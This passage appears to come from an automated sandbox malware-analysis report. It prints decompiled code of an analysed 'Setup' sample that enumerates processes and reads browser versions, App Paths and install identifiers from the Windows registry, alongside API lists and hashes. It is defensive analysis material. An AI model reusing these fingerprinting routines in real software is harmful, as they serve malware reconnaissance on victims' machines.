                                                                                                                                                              						_push(_v20);
                                                                                                                                                              						L0046BBEC();
                                                                                                                                                              						if(_t52 != 0) {
                                                                                                                                                              							goto L5;
                                                                                                                                                              						} else {
                                                                                                                                                              							CloseHandle(_v20);
                                                                                                                                                              							_t50 = 0;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_push(0x104);
                                                                                                                                                              						_push( &_v544);
                                                                                                                                                              						_push(_v548);
                                                                                                                                                              						_push(_v20); // executed
                                                                                                                                                              						L0046BBE0(); // executed
                                                                                                                                                              						L5:
                                                                                                                                                              						E00417910( &_v544, E00434050( &_v621));
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						_t82 =  &_v620;
                                                                                                                                                              						E004181D0(_a8,  &_v620);
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						E004176E0();
                                                                                                                                                              						FindCloseChangeNotification(_v20); // executed
                                                                                                                                                              						_t50 = E0042E0C0(_a8 + 4);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_t50, _t62, _v24 ^ _t87, _t82, _t85, _t86);
                                                                                                                                                              			}

                                                                                                                                                              APIs
                                                                                                                                                              • _memset.LIBCMT ref: 004961A6
                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,004E02FB,?,N/A,00000000,?,?,DDD124F9), ref: 004961FD
                                                                                                                                                              • EnumProcessModules.PSAPI(00000000,00000000,00000004,00000000,?,?,DDD124F9), ref: 00496238
                                                                                                                                                              • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000104,00000000,00000000,00000004,00000000,?,?,DDD124F9), ref: 00496258
                                                                                                                                                              • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,00000000,00000000,00000004,00000000,?,?,DDD124F9), ref: 0049626F
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000104,00000000,00000000,00000004,00000000,?,?,DDD124F9), ref: 0049627C
                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,00000000,?,00000104,00000000,00000000,00000004,00000000,?,?,DDD124F9), ref: 004962D6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CloseFileName$ChangeEnumFindHandleImageModuleModulesNotificationOpen_memset
                                                                                                                                                              • String ID: N/A
                                                                                                                                                              • API String ID: 2394274632-2525114547
                                                                                                                                                              • Opcode ID: b5c1a42de278e672675ba6a7fc7533878be40c9162315e7e6c9ca31d811e26e5
                                                                                                                                                              • Instruction ID: 42d94aa43d634cfac3a89f673f245cccc0f2457812a480bc51963134419dc0f8
                                                                                                                                                              • Opcode Fuzzy Hash: b5c1a42de278e672675ba6a7fc7533878be40c9162315e7e6c9ca31d811e26e5
                                                                                                                                                              • Instruction Fuzzy Hash: 5B41BF71900218ABDB14EFA0DC49FEEB374FF18300F0046AEB519A7190EB786A48CF58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E0048CC50(void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				char _v28;
                                                                                                                                                              				signed int _v32;
                                                                                                                                                              				char _v94;
                                                                                                                                                              				char _v96;
                                                                                                                                                              				char _v124;
                                                                                                                                                              				char _v128;
                                                                                                                                                              				char _v129;
                                                                                                                                                              				signed int _v136;
                                                                                                                                                              				signed int _t30;
                                                                                                                                                              				signed int _t31;
                                                                                                                                                              				void* _t36;
                                                                                                                                                              				signed int _t47;
                                                                                                                                                              				signed char _t54;
                                                                                                                                                              				signed int _t78;
                                                                                                                                                              
                                                                                                                                                              				_t77 = __esi;
                                                                                                                                                              				_t76 = __edi;
                                                                                                                                                              				_t55 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50eabb);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t30 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t31 = _t30 ^ _t78;
                                                                                                                                                              				_v32 = _t31;
                                                                                                                                                              				_push(_t31);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				if(( *0x5c3048 & 0x00000001) == 0) {
                                                                                                                                                              					 *0x5c3048 =  *0x5c3048 | 0x00000001;
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					_t54 = E0048C830(__ebx, __edi, __esi,  *0x5c3048 | 0x00000001); // executed
                                                                                                                                                              					asm("sbb edx, edx");
                                                                                                                                                              					_t73 =  ~( ~(_t54 & 0x000000ff));
                                                                                                                                                              					 *0x5c3044 =  ~( ~(_t54 & 0x000000ff));
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              				}
                                                                                                                                                              				if( *0x5c3044 <= 1) {
                                                                                                                                                              					E00434E30( &_v24);
                                                                                                                                                              					_v8 = 1;
                                                                                                                                                              					_t36 = E0041EEA0( &_v24, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Google Chrome\\", 1); // executed
                                                                                                                                                              					__eflags = _t36;
                                                                                                                                                              					if(_t36 != 0) {
                                                                                                                                                              						E004175C0(E00434050( &_v129));
                                                                                                                                                              						_v8 = 2;
                                                                                                                                                              						_t73 =  &_v128;
                                                                                                                                                              						E0048C630(_t55, _t76, _t77, __eflags,  &_v128);
                                                                                                                                                              						E00427FD0(_t55, _t76, _t77, __eflags,  &_v128);
                                                                                                                                                              						 *0x5c3044 = E00451CBD(PathFindFileNameW(E00416A30( &_v124)), 0, 0xa);
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						E004176E0();
                                                                                                                                                              					} else {
                                                                                                                                                              						_v96 = 0;
                                                                                                                                                              						E00451D90(_t76,  &_v94, 0, 0x3e);
                                                                                                                                                              						_v28 = 0x20;
                                                                                                                                                              						_t73 =  &_v28;
                                                                                                                                                              						E0041EDE0( &_v24, L"Version",  &_v96,  &_v28); // executed
                                                                                                                                                              						 *0x5c3044 = E00451CBD( &_v96, 0, 0xa);
                                                                                                                                                              					}
                                                                                                                                                              					_v136 =  *0x5c3044;
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E0041EF60( &_v24);
                                                                                                                                                              					_t47 = _v136;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t47 =  *0x5c3044;
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_t47, _t55, _v32 ^ _t78, _t73, _t76, _t77);
                                                                                                                                                              			}





















                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0048CCC9
                                                                                                                                                                • Part of subcall function 0041EEA0: RegOpenKeyExW.KERNEL32(00000001,?,00000000,00000000,00000000,Software\Microsoft\Internet Explorer\,00000001), ref: 0041EECA
                                                                                                                                                              • _memset.LIBCMT ref: 0048CCFB
                                                                                                                                                                • Part of subcall function 0041EDE0: RegQueryValueExW.KERNEL32(00000020,00000001,00000000,00000020,?,00000001,0047F702,svcVersion,00000001,00000020,Software\Microsoft\Internet Explorer\,00000001,DDD124F9), ref: 0041EE1C
                                                                                                                                                              • __wcstoi64.LIBCMT ref: 0048CD27
                                                                                                                                                                • Part of subcall function 00451CBD: wcstoxl.LIBCMT ref: 00451CDE
                                                                                                                                                              • PathFindFileNameW.SHLWAPI(00000000,00000000,0000000A,?,DDD124F9), ref: 0048CD70
                                                                                                                                                              • __wcstoi64.LIBCMT ref: 0048CD77
                                                                                                                                                              Strings
                                                                                                                                                              • , xrefs: 0048CD03
                                                                                                                                                              • Version, xrefs: 0048CD12
                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\, xrefs: 0048CCD7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __wcstoi64$FileFindIterator_baseIterator_base::_NameOpenPathQueryValue_memsetstd::_wcstoxl
                                                                                                                                                              • String ID: $Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\$Version
                                                                                                                                                              • API String ID: 1568900015-1727943444
                                                                                                                                                              • Opcode ID: 521478ba815602622f90f5b8606e70cd6a66c0934ffa0e2284376f21bd9d5987
                                                                                                                                                              • Instruction ID: 835d22ece1afbabd0d8e238a4dcff697028dac8f7890ad11750f1be22d999115
                                                                                                                                                              • Opcode Fuzzy Hash: 521478ba815602622f90f5b8606e70cd6a66c0934ffa0e2284376f21bd9d5987
                                                                                                                                                              • Instruction Fuzzy Hash: DF41DF71D006089FCB24EBA4ED86BEDB7B4EB14704F10852EE516A72D1EB386708CB59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 984 47f670-47f69f 985 47f6a5-47f6ca call 434e30 call 41eea0 984->985 986 47f75a-47f75e 984->986 995 47f6cc-47f6fd call 451d90 call 41ede0 985->995 996 47f74b-47f755 call 41ef60 985->996 987 47f760-47f769 986->987 988 47f76b-47f788 call 44f6c8 986->988 987->988 1001 47f702-47f709 995->1001 996->986 1002 47f70b-47f727 call 41ede0 1001->1002 1003 47f72a-47f72e 1001->1003 1002->1003 1003->996 1005 47f730-47f748 call 452133 1003->1005 1005->996
                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E0047F670(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				char _v28;
                                                                                                                                                              				signed int _v32;
                                                                                                                                                              				char _v94;
                                                                                                                                                              				char _v96;
                                                                                                                                                              				intOrPtr _v100;
                                                                                                                                                              				signed int _t28;
                                                                                                                                                              				signed int _t29;
                                                                                                                                                              				intOrPtr _t31;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              				short _t36;
                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                              				void* _t43;
                                                                                                                                                              				void* _t58;
                                                                                                                                                              				signed int _t59;
                                                                                                                                                              
                                                                                                                                                              				_t58 = __esi;
                                                                                                                                                              				_t57 = __edi;
                                                                                                                                                              				_t43 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5059c6);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t28 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t29 = _t28 ^ _t59;
                                                                                                                                                              				_v32 = _t29;
                                                                                                                                                              				_push(_t29);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				if( *0x5c2144 == 0) {
                                                                                                                                                              					E00434E30( &_v24);
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					_t34 = E0041EEA0( &_v24, 0x80000002, L"Software\\Microsoft\\Internet Explorer\\", 1); // executed
                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                              						_t36 =  *0x5244e4; // 0x0
                                                                                                                                                              						_v96 = _t36;
                                                                                                                                                              						E00451D90(__edi,  &_v94, 0, 0x3e);
                                                                                                                                                              						_v28 = 0x20;
                                                                                                                                                              						_t56 =  &_v28;
                                                                                                                                                              						_t39 = E0041EDE0( &_v24, L"svcVersion",  &_v96,  &_v28); // executed
                                                                                                                                                              						_v100 = _t39;
                                                                                                                                                              						if(_v100 != 0) {
                                                                                                                                                              							_v28 = 0x20;
                                                                                                                                                              							_t56 =  &_v96;
                                                                                                                                                              							_v100 = E0041EDE0( &_v24, L"Version",  &_v96,  &_v28);
                                                                                                                                                              						}
                                                                                                                                                              						if(_v100 == 0) {
                                                                                                                                                              							_push(0x5c2148);
                                                                                                                                                              							E00452133( &_v96, L"%d.%d", 0x5c2144);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E0041EF60( &_v24); // executed
                                                                                                                                                              				}
                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                              					_t56 =  *0x5c2148; // 0x1
                                                                                                                                                              					 *_a4 = _t56;
                                                                                                                                                              				}
                                                                                                                                                              				_t31 =  *0x5c2144; // 0xb
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_t31, _t43, _v32 ^ _t59, _t56, _t57, _t58);
                                                                                                                                                              			}





















                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0047F6A8
                                                                                                                                                                • Part of subcall function 0041EEA0: RegOpenKeyExW.KERNEL32(00000001,?,00000000,00000000,00000000,Software\Microsoft\Internet Explorer\,00000001), ref: 0041EECA
                                                                                                                                                              • _memset.LIBCMT ref: 0047F6DE
                                                                                                                                                                • Part of subcall function 0041EDE0: RegQueryValueExW.KERNEL32(00000020,00000001,00000000,00000020,?,00000001,0047F702,svcVersion,00000001,00000020,Software\Microsoft\Internet Explorer\,00000001,DDD124F9), ref: 0041EE1C
                                                                                                                                                              • _swscanf.LIBCMT ref: 0047F743
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Iterator_baseIterator_base::_OpenQueryValue_memset_swscanfstd::_
                                                                                                                                                              • String ID: $%d.%d$Software\Microsoft\Internet Explorer\$Version$svcVersion
                                                                                                                                                              • API String ID: 1427520148-2889293724
                                                                                                                                                              • Opcode ID: d6e4a18a42091573337230af4ee22e0c88e750f7268c64f949c79d1e53797a00
                                                                                                                                                              • Instruction ID: a19b341dfb138a983270e55979cb8246c53d88c77a451253226e6c69376a3b92
                                                                                                                                                              • Opcode Fuzzy Hash: d6e4a18a42091573337230af4ee22e0c88e750f7268c64f949c79d1e53797a00
                                                                                                                                                              • Instruction Fuzzy Hash: 33316B74900208AFDB14DFA5D946FEEB774FB14704F00852EE9196B2D0E7781A49CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                              			E00482D30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				void* _v52;
                                                                                                                                                              				char _v60;
                                                                                                                                                              				char _v584;
                                                                                                                                                              				char _v588;
                                                                                                                                                              				char _v620;
                                                                                                                                                              				char _v648;
                                                                                                                                                              				intOrPtr _v652;
                                                                                                                                                              				intOrPtr _v656;
                                                                                                                                                              				intOrPtr _v660;
                                                                                                                                                              				intOrPtr _v664;
                                                                                                                                                              				char _v668;
                                                                                                                                                              				intOrPtr _v672;
                                                                                                                                                              				intOrPtr _v676;
                                                                                                                                                              				signed int _t62;
                                                                                                                                                              				signed int _t63;
                                                                                                                                                              				intOrPtr _t67;
                                                                                                                                                              				void* _t75;
                                                                                                                                                              				signed int _t142;
                                                                                                                                                              
                                                                                                                                                              				_t141 = __esi;
                                                                                                                                                              				_t140 = __edi;
                                                                                                                                                              				_t99 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50a749);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t62 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t63 = _t62 ^ _t142;
                                                                                                                                                              				_v20 = _t63;
                                                                                                                                                              				_push(_t63);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				E00434E30( &_v60);
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t67 = E00482980(__ebx, __edi, __esi, __eflags,  &_v620, "LIpq0hKVkVaLMSLNpdvbwZ1ujeVTM3C6kW4BzYpnFeY3Qs6E"); // executed
                                                                                                                                                              				_v656 = _t67;
                                                                                                                                                              				_v660 = _v656;
                                                                                                                                                              				_v8 = 1;
                                                                                                                                                              				_v664 = _v660;
                                                                                                                                                              				if(_v664 == 0) {
                                                                                                                                                              					_v668 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v668 = _v664 + 4;
                                                                                                                                                              				}
                                                                                                                                                              				_t138 =  &_v648;
                                                                                                                                                              				_v672 = E00409760( &_v648, L"Software\\", _v668);
                                                                                                                                                              				_v676 = _v672;
                                                                                                                                                              				_v8 = 2;
                                                                                                                                                              				E00409810(_v676);
                                                                                                                                                              				_v8 = 4;
                                                                                                                                                              				E004178C0( &_v648);
                                                                                                                                                              				_v8 = 5;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				E00405140(_a4 + 4);
                                                                                                                                                              				_t75 = E0041EEA0( &_v60, 0x80000001, E00416A30( &_v48), 1); // executed
                                                                                                                                                              				if(_t75 == 0) {
                                                                                                                                                              					_v588 = 0x104;
                                                                                                                                                              					_t138 =  &_v588;
                                                                                                                                                              					if(E0041EDE0( &_v60, L"INSTALL_FOLDER_NAME",  &_v584,  &_v588) == 0) {
                                                                                                                                                              						E00495D00(_t99, _t140, _t141, 0x23, _a4, 1, 1);
                                                                                                                                                              						E004130A0(_t99, E004130A0(_t99, _a4 + 4, _t140, _t141,  &_v584), _t140, _t141, "\\");
                                                                                                                                                              						_v588 = 0x104;
                                                                                                                                                              						E0041EDE0( &_v60, L"version",  &_v584,  &_v588);
                                                                                                                                                              						_t138 =  &_v584;
                                                                                                                                                              						E004130A0(_t99, E004130A0(_t99, _a4 + 4, _t140, _t141,  &_v584), _t140, _t141, "\\");
                                                                                                                                                              						_v588 = 0x104;
                                                                                                                                                              						if(E0041EDE0( &_v60, L"GUID",  &_v584,  &_v588) == 0) {
                                                                                                                                                              							_t138 =  &_v584;
                                                                                                                                                              							E004130A0(_t99, E004130A0(_t99, _a4 + 4, _t140, _t141,  &_v584), _t140, _t141, "\\");
                                                                                                                                                              							if((E00482950(_a4) & 0x000000ff) == 0) {
                                                                                                                                                              								E00405140(_a4 + 4);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_v652 = E0042E0C0(_a4 + 4);
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				E0041EF60( &_v60);
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				_t60 =  &_v20; // 0x482fe9
                                                                                                                                                              				return E0044F6C8(_v652, _t99,  *_t60 ^ _t142, _t138, _t140, _t141);
                                                                                                                                                              			}


























                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00482D5E
                                                                                                                                                                • Part of subcall function 00482980: __wsplitpath.LIBCMT ref: 00482A17
                                                                                                                                                                • Part of subcall function 00482980: PathAddBackslashW.SHLWAPI(?), ref: 00482A26
                                                                                                                                                                • Part of subcall function 00482980: GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00482A43
                                                                                                                                                                • Part of subcall function 00482980: _sprintf.LIBCMT ref: 00482A59
                                                                                                                                                                • Part of subcall function 00482980: _strlen.LIBCMT ref: 00482A6F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BackslashInformationIterator_baseIterator_base::_PathVolume__wsplitpath_sprintf_strlenstd::_
                                                                                                                                                              • String ID: GUID$INSTALL_FOLDER_NAME$LIpq0hKVkVaLMSLNpdvbwZ1ujeVTM3C6kW4BzYpnFeY3Qs6E$Software\$version$/H
                                                                                                                                                              • API String ID: 296098145-1771210073
                                                                                                                                                              • Opcode ID: 3f38cdbd748789065e946d3ff6c62db60fb7ea56a97dfecbf67fa942f62a7179
                                                                                                                                                              • Instruction ID: a4e47fa03a4ea7bb8f9dc1b7f546aa884ffc29575824f17271174dd53e9144ec
                                                                                                                                                              • Opcode Fuzzy Hash: 3f38cdbd748789065e946d3ff6c62db60fb7ea56a97dfecbf67fa942f62a7179
                                                                                                                                                              • Instruction Fuzzy Hash: 7B619F70900119AFDB14EF65DD9ABEDBBB4EF04308F4041AEF50967281EB746A84CF94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00495E20(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				signed int _v28;
                                                                                                                                                              				char _v56;
                                                                                                                                                              				void* _v60;
                                                                                                                                                              				char _v582;
                                                                                                                                                              				short _v584;
                                                                                                                                                              				char _v588;
                                                                                                                                                              				char _v589;
                                                                                                                                                              				char _v624;
                                                                                                                                                              				char _v625;
                                                                                                                                                              				intOrPtr _v632;
                                                                                                                                                              				char _v636;
                                                                                                                                                              				signed int _t51;
                                                                                                                                                              				signed int _t52;
                                                                                                                                                              				void* _t60;
                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                              				void* _t67;
                                                                                                                                                              				void* _t80;
                                                                                                                                                              				void* _t110;
                                                                                                                                                              				signed int _t111;
                                                                                                                                                              
                                                                                                                                                              				_t110 = __esi;
                                                                                                                                                              				_t109 = __edi;
                                                                                                                                                              				_t80 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x508587);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t51 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t52 = _t51 ^ _t111;
                                                                                                                                                              				_v28 = _t52;
                                                                                                                                                              				_push(_t52);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				E00434E30( &_v24);
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E00417910(L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\", E00434050( &_v589));
                                                                                                                                                              				_v8 = 1;
                                                                                                                                                              				E004130D0( &_v56, _a4);
                                                                                                                                                              				_t60 = E0041EEA0( &_v24, 0x80000002, E00416A30( &_v56), 1); // executed
                                                                                                                                                              				if(_t60 != 0) {
                                                                                                                                                              					L5:
                                                                                                                                                              					_v636 = 0;
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E0041EF60( &_v24);
                                                                                                                                                              					_t63 = _v636;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v584 = 0;
                                                                                                                                                              					_t106 =  &_v582;
                                                                                                                                                              					E00451D90(__edi,  &_v582, 0, 0x206);
                                                                                                                                                              					_v588 = 0x104;
                                                                                                                                                              					_t67 = E0041EDE0( &_v24, L"Path",  &_v584,  &_v588); // executed
                                                                                                                                                              					if(_t67 != 0) {
                                                                                                                                                              						goto L5;
                                                                                                                                                              					} else {
                                                                                                                                                              						if(( *(_t111 + E0044F9A4( &_v584) * 2 - 0x246) & 0x0000ffff) == 0x3b) {
                                                                                                                                                              							 *(_t111 + E0044F9A4( &_v584) * 2 - 0x246) = 0;
                                                                                                                                                              						}
                                                                                                                                                              						PathAddBackslashW( &_v584);
                                                                                                                                                              						E00417910( &_v584, E00434050( &_v625));
                                                                                                                                                              						_v8 = 2;
                                                                                                                                                              						_t106 =  &_v624;
                                                                                                                                                              						E004181D0(_a8,  &_v624);
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						E004176E0();
                                                                                                                                                              						_v632 = E0042E0C0(_a8 + 4);
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						E004176E0();
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						E0041EF60( &_v24); // executed
                                                                                                                                                              						_t63 = _v632;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_t63, _t80, _v28 ^ _t111, _t106, _t109, _t110);
                                                                                                                                                              			}


























                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00495E4E
                                                                                                                                                                • Part of subcall function 0041EEA0: RegOpenKeyExW.KERNEL32(00000001,?,00000000,00000000,00000000,Software\Microsoft\Internet Explorer\,00000001), ref: 0041EECA
                                                                                                                                                              • _memset.LIBCMT ref: 00495EBA
                                                                                                                                                                • Part of subcall function 0041EDE0: RegQueryValueExW.KERNEL32(00000020,00000001,00000000,00000020,?,00000001,0047F702,svcVersion,00000001,00000020,Software\Microsoft\Internet Explorer\,00000001,DDD124F9), ref: 0041EE1C
                                                                                                                                                              • _wcslen.LIBCMT ref: 00495EF6
                                                                                                                                                              • _wcslen.LIBCMT ref: 00495F12
                                                                                                                                                              • PathAddBackslashW.SHLWAPI(?,00000104,Software\Microsoft\Windows\CurrentVersion\App Paths\,00000000,DDD124F9), ref: 00495F2B
                                                                                                                                                              Strings
                                                                                                                                                              • Path, xrefs: 00495EDA
